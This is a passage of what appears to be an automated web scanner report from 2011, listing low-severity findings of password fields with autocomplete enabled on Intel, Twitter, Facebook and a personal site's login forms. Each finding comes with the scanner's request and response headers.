User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=870d40b73302ba266471c5df270a786b; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 38292

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...
<div class="boxBody">
<form action="https://ssl.software.intel.com/en-us/login/?Lang=ENG&amp;TARGET=http://software.intel.com/en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran" method="post">
<input type="hidden" name="qlogin" value="true" />
...[SNIP]...
<div class="value"><input id="txtPassword" name="txtPassword" class="login" size="12" type="password" /></div>
...[SNIP]...

13.16. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/

Issue detail

The page contains a form with the following action URL:
  • https://ssl.software.intel.com/en-us/login/?Lang=ENG&TARGET=http://software.intel.com/en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a
The form contains the following password field with autocomplete enabled:
  • txtPassword

Request

GET /en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=7c7fa33f5e3871a2f2f8ad2e5fc6cc5f; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 40744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...
<div class="boxBody">
<form action="https://ssl.software.intel.com/en-us/login/?Lang=ENG&amp;TARGET=http://software.intel.com/en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a" method="post">
<input type="hidden" name="qlogin" value="true" />
...[SNIP]...
<div class="value"><input id="txtPassword" name="txtPassword" class="login" size="12" type="password" /></div>
...[SNIP]...

13.17. http://twitter.com/EricMMartin  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /EricMMartin

Issue detail

The page contains a form with the following action URL:
  • https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
  • session[password]

Request

GET /EricMMartin HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 05 Feb 2011 23:22:34 GMT
Server: hi
Status: 200 OK
X-Transaction: Sat Feb 05 23:22:34 +0000 2011-15854-13086
ETag: "b0c81407bf609b9b1cf953048b1105ab"
Last-Modified: Sat, 05 Feb 2011 23:22:34 GMT
X-Runtime: 0.00598
Content-Type: text/html; charset=utf-8
Content-Length: 58433
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296948154509230; path=/; expires=Sat, 12-Feb-11 23:22:34 GMT; domain=.twitter.com
Set-Cookie: guest_id=129694815451621917; path=/; expires=Mon, 07 Mar 2011 23:22:34 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJZQIvgtAToHaWQiJTMyMDRkZDM2M2Y2OTVm%250AMjM0ZWVmYjAyMjcyMGRlYWM0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--cda732cdfd73b9251d4ab751bf5e3c3ba07fa792; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="0626a4b840444a81fceaf5c1bf2b3159fba272eb" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

13.18. http://twitter.com/intel  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /intel

Issue detail

The page contains a form with the following action URL:
  • https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
  • session[password]

Request

GET /intel HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 05 Feb 2011 23:22:35 GMT
Server: hi
Status: 200 OK
X-Transaction: Sat Feb 05 23:22:35 +0000 2011-36832-54399
ETag: "3f5b73f849632157648b0cfb3f55a625"
Last-Modified: Sat, 05 Feb 2011 23:22:35 GMT
X-Runtime: 0.00573
Content-Type: text/html; charset=utf-8
Content-Length: 57222
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296948155814524; path=/; expires=Sat, 12-Feb-11 23:22:35 GMT; domain=.twitter.com
Set-Cookie: guest_id=129694815582299188; path=/; expires=Mon, 07 Mar 2011 23:22:35 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCK9VIvgtAToHaWQiJTZlNDMwNDM3NzI0Y2Zk%250AMzE2ZDVlMGRkYTQ2ZGMyNzdjIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a5011ad7a2fc54a431253ef8fa174a4aab1fa4cd; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="a8fcb7f818d9ecda066f9056e6076e0f40c37c6e" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

13.19. http://twitter.com/intelnews  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /intelnews

Issue detail

The page contains a form with the following action URL:
  • https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
  • session[password]

Request

GET /intelnews HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 05 Feb 2011 23:22:36 GMT
Server: hi
Status: 200 OK
X-Transaction: Sat Feb 05 23:22:36 +0000 2011-99178-30534
ETag: "5ef92426ebdf2d0090dae9af07327303"
Last-Modified: Sat, 05 Feb 2011 23:22:36 GMT
X-Runtime: 0.00428
Content-Type: text/html; charset=utf-8
Content-Length: 50405
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296948156798428; path=/; expires=Sat, 12-Feb-11 23:22:36 GMT; domain=.twitter.com
Set-Cookie: guest_id=129694815680453038; path=/; expires=Mon, 07 Mar 2011 23:22:36 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCIVZIvgtAToHaWQiJWQ5Yzk4ZmY4Yzc2ODMw%250ANDBmOWI3NmU3NTA5N2I5MmU1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--e3633c355f5d65ff6cfe5bdaa2b0cfdaeeaa156d; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="da409a9ba3cddadd6a0804de0b31df1629e556c0" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

13.20. http://www.connect.facebook.com/widgets/fan.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.connect.facebook.com
Path:   /widgets/fan.php

Issue detail

The page contains a form with the following action URL:
  • https://www.connect.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /widgets/fan.php HTTP/1.1
Host: www.connect.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 05 Feb 2011 23:21:13 GMT
Content-Length: 10636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.connect.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

13.21. http://www.ericmmartin.com/projects/simplemodal/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ericmmartin.com
Path:   /projects/simplemodal/

Issue detail

The page contains a form with the following action URL:
  • http://www.ericmmartin.com/wordpress/wp-login.php
The form contains the following password field with autocomplete enabled:
  • pwd

Request

GET /projects/simplemodal/ HTTP/1.1
Host: www.ericmmartin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Pingback: http://www.ericmmartin.com/wordpress/xmlrpc.php
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sat, 05 Feb 2011 20:00:09 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33772


<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

<title>SimpleModal / Eric Martin / ericmmartin.com</title>

<meta name="author" content="Eric Ma
...[SNIP]...
<div id="simplemodal-login-form" style="display:none">
   <form name="loginform" id="loginform" action="http://www.ericmmartin.com/wordpress/wp-login.php" method="post">
       <div class="title">
...[SNIP]...
<br />
           <input type="password" name="pwd" class="user_pass input" value="" size="20" tabindex="20" /></label>
...[SNIP]...

13.22. http://www.facebook.com/Intel  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /Intel

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /Intel HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=PvG3c; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 05 Feb 2011 23:21:09 GMT
Content-Length: 43972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

13.23. http://www.facebook.com/sharer.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer.php

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1&display=popup
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /sharer.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=nQPs-; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 05 Feb 2011 23:21:08 GMT
Content-Length: 10821

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="login_form_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1&amp;display=popup" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
</label><input type="password" class="inputpassword" id="pass" name="pass" value="" /></div>
...[SNIP]...

13.24. http://www.intel.com/cd/channel/distributor/asmo-na/eng/index.htm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.intel.com
Path:   /cd/channel/distributor/asmo-na/eng/index.htm

Issue detail

The page contains a form with the following action URL:
  • http://www.intel.com/cd/channel/distributor/asmo-na/eng/index.htm?iid=subhdr+ptr_chan_disti
The form contains the following password field with autocomplete enabled:
  • txtPassword

Request

GET /cd/channel/distributor/asmo-na/eng/index.htm?iid=subhdr+ptr_chan_disti HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Z: G08
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Sat, 05 Feb 2011 23:18:36 GMT
Date: Sat, 05 Feb 2011 23:18:36 GMT
Connection: close
Connection: Transfer-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Content-Length: 35633

...<html xmlns:wsml="urn:org:wsml:2003:html" xmlns:str="http://exslt.org/strings" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><head><META http-equiv="Content-Type" content="text/html; charset=utf-8">
...[SNIP]...
<div id="hptopwhite"><form id="Form1" method="post" name="Form1"><table cellpadding="0" cellspacing="0" border="0" width="95%" align="center">
...[SNIP]...
<td><input id="txtPassword" onkeydown="if(event.keyCode==13) javascript:rememberme_check(param_a,param_b);" type="password" name="txtPassword"></td>
...[SNIP]...

13.25. http://www.intel.com/cd/channel/distributor/asmo-na/eng/index.htm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.intel.com
Path:   /cd/channel/distributor/asmo-na/eng/index.htm

Issue detail

The page contains a form with the following action URL:
  • http://www.intel.com/cd/channel/distributor/asmo-na/eng/index.htm
The form contains the following password field with autocomplete enabled:
  • txtPassword

Request

GET /cd/channel/distributor/asmo-na/eng/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Z: G08
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Sat, 05 Feb 2011 23:18:40 GMT
Date: Sat, 05 Feb 2011 23:18:40 GMT
Connection: close
Connection: Transfer-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Content-Length: 35633

...<html xmlns:wsml="urn:org:wsml:2003:html" xmlns:str="http://exslt.org/strings" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><head><META http-equiv="Content-Type" content="text/html; charset=utf-8">
...[SNIP]...
<div id="hptopwhite"><form id="Form1" method="post" name="Form1"><table cellpadding="0" cellspacing="0" border="0" width="95%" align="center">
...[SNIP]...
<td><input id="txtPassword" onkeydown="if(event.keyCode==13) javascript:rememberme_check(param_a,param_b);" type="password" name="txtPassword"></td>
...[SNIP]...

13.26. http://www.intel.com/cd/channel/reseller/asmo-na/eng/index.htm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.intel.com
Path:   /cd/channel/reseller/asmo-na/eng/index.htm

Issue detail

The page contains a form with the following action URL:
  • http://www.intel.com/cd/channel/reseller/asmo-na/eng/index.htm?iid=gg_work+home_reseller
The form contains the following password field with autocomplete enabled:
  • txtPassword

Request

GET /cd/channel/reseller/asmo-na/eng/index.htm?iid=gg_work+home_reseller HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Z: G15
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Sat, 05 Feb 2011 23:18:33 GMT
Date: Sat, 05 Feb 2011 23:18:33 GMT
Connection: close
Connection: Transfer-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Content-Length: 47184

...<html xmlns:wsml="urn:org:wsml:2003:html" xmlns:cd="urn:schemas-microsoft-com:xslt" xmlns:str="http://exslt.org/strings" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><head><META http-equiv="Content
...[SNIP]...
<div id="hptopwhite"><form id="Form1" method="post" name="Form1"><table cellpadding="0" cellspacing="0" border="0" width="95%" align="center">
...[SNIP]...
<td><input size="26" class="text" id="txtPassword" onkeydown="if(event.keyCode==13) javascript:rememberme_check(param_a,param_b);" type="password" name="txtPassword"></td>
...[SNIP]...

13.27. http://www.intel.com/cd/channel/reseller/asmo-na/eng/index.htm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.intel.com
Path:   /cd/channel/reseller/asmo-na/eng/index.htm

Issue detail

The page contains a form with the following action URL:
  • http://www.intel.com/cd/channel/reseller/asmo-na/eng/index.htm
The form contains the following password field with autocomplete enabled:
  • txtPassword

Request

GET /cd/channel/reseller/asmo-na/eng/index.htm HTTP/1.1
Host: www.intel.com
